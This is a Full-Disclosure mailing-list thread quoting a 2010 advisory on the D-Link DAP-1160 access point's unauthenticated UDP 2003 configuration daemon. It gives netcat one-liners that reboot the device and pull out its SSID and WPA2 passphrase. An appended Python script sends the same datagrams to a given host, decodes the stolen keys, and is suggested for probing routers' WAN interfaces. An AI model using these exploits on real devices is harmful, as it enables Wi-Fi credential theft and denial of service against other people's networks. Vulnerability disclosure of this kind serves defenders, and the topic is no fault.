Is that UDP 2003 open on the WAN interface as well?
Gary Baribault
On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
Security Advisory
IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
Advisory Information
--------------------
Published: 2010-06-28
Updated: 2010-06-28
Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06, 1.30b10, 1.31b01
Vulnerability Details
---------------------
Public References:
Not Assigned
Platform:
Successfully tested on D-Link DAP-1160 loaded with firmware versions: v120b06, v130b10, v131b01.
Other models and/or firmware versions may also be affected.
Note: Only firmware version major numbers are displayed on the administration web interface: 1.20, 1.30, 1.31
Background Information:
D-Link DAP-1160 is a wireless access point that allows wireless clients connectivity to wired networks.
Supports the 802.11b and 802.11g protocols. WEP, WPA and WPA2 are supported.
Summary:
Unauthenticated access and modification of several device parameters, including Wi-Fi SSID, keys and passphrases, is possible.
Unauthenticated remote reboot of the device can also be performed.
Details:
DCCD is a UDP daemon that listens on port UDP 2003 of the device, and is likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol.
By sending properly formatted UDP datagrams to the dccd daemon it is possible to perform security-relevant operations without any previous authentication.
It is possible to remotely retrieve sensitive wireless configuration parameters, such as Wi-Fi SSID, encryption types, keys and passphrases, along with other additional information.
It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password.
Remote reboot is another operation that an attacker may perform in an unauthenticated way, possibly triggering a Denial-of-Service condition.
POC:
- Remote reboot
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram)
- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)
Impacts:
Remote extraction of sensitive information
Modification of existing device configuration
Possible Denial-of-Service
Solutions & Workaround:
Not available
Additional Information
----------------------
Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website
18/02/2010: Point of contact requested to customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory
Additional information available at http://www.icysilence.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
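The PoC above drives the datagrams through Python 2's print and nc, and reads the reply out of a hex dump. The following script is an added example (not code from the advisory or from D-Link) that builds the same request datagrams with a real UDP socket and decodes the reply. Everything beyond what the PoC shows is an assumption and is marked as such: that the request items and the reply records are tag (2 bytes, little-endian) + length (2 bytes, little-endian) + value, that the last length byte can be 0x00 rather than the 0x0a that Python 2's print appended in the PoC, and the constructed SAMPLE_REPLY used for offline testing. The tag 0x2723 is sent alongside the PSK tag in the PoC; the advisory does not say what it holds.

```python
"""dccd_probe.py: build and decode DCC (D-Link Click 'n Connect) datagrams for UDP/2003.

Added example for IS-2010-004; the TLV layout (2-byte LE tag, 2-byte LE length,
value) is inferred from the PoC bytes and is an assumption, not documented behaviour.
"""
import socket
import struct

DCCD_PORT = 2003
OP_GET = 0x03      # opcode used by the "retrieve" PoCs
OP_REBOOT = 0x05   # opcode used by the "remote reboot" PoC
HEADER_LEN = 8     # opcode + 7 zero bytes

# Tags as 16-bit little-endian values: "21 27" on the wire is 0x2721.
TAG_SSID = 0x2721
TAG_2723 = 0x2723      # queried together with the PSK in the PoC; meaning not stated
TAG_WPA_PSK = 0x2724


def build_request(opcode, tags=()):
    """Opcode byte, 7 zero bytes, then tag+zero-length per queried item (assumed layout)."""
    pkt = bytes([opcode]) + b"\x00" * 7
    for tag in tags:
        pkt += struct.pack("<HH", tag, 0)   # length 0 marks a query (assumption)
    return pkt


def parse_response(data):
    """Walk tag/length/value records after the 8-byte header; returns {tag: value_bytes}."""
    values = {}
    pos = HEADER_LEN
    while pos + 4 <= len(data):
        tag, length = struct.unpack_from("<HH", data, pos)
        pos += 4
        if pos + length > len(data):
            break   # truncated record: stop instead of reading past the datagram
        values[tag] = data[pos:pos + length]
        pos += length
    return values


def query(host, tags, timeout=2.0):
    """Send a GET for the given tags and decode the reply; None on timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_request(OP_GET, tags), (host, DCCD_PORT))
        data, _ = sock.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        sock.close()
    return parse_response(data)


# Constructed sample reply (not captured from a device) in the assumed layout:
# header, then SSID record "21 27 05 00 MyNet", then PSK record "24 27 0a 00 secretpass".
SAMPLE_REPLY = (
    b"\x03" + b"\x00" * 7
    + struct.pack("<HH", TAG_SSID, 5) + b"MyNet"
    + struct.pack("<HH", TAG_WPA_PSK, 10) + b"secretpass"
)


def demo():
    """Offline walk-through: request bytes for the two PoCs and the decoded sample reply."""
    return {
        "reboot": build_request(OP_REBOOT).hex(),
        "get_ssid": build_request(OP_GET, [TAG_SSID]).hex(),
        "decoded": {hex(t): v.decode("ascii", "replace")
                    for t, v in parse_response(SAMPLE_REPLY).items()},
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print(query(sys.argv[1], [TAG_SSID, TAG_WPA_PSK]))
    else:
        print(demo())
```

Run with no arguments to see the request bytes and the decoded sample; run with the device address to query a real unit (test only devices you own). Pointing it at the router's WAN address, from outside, is the quickest way to settle whether the port is reachable on that interface.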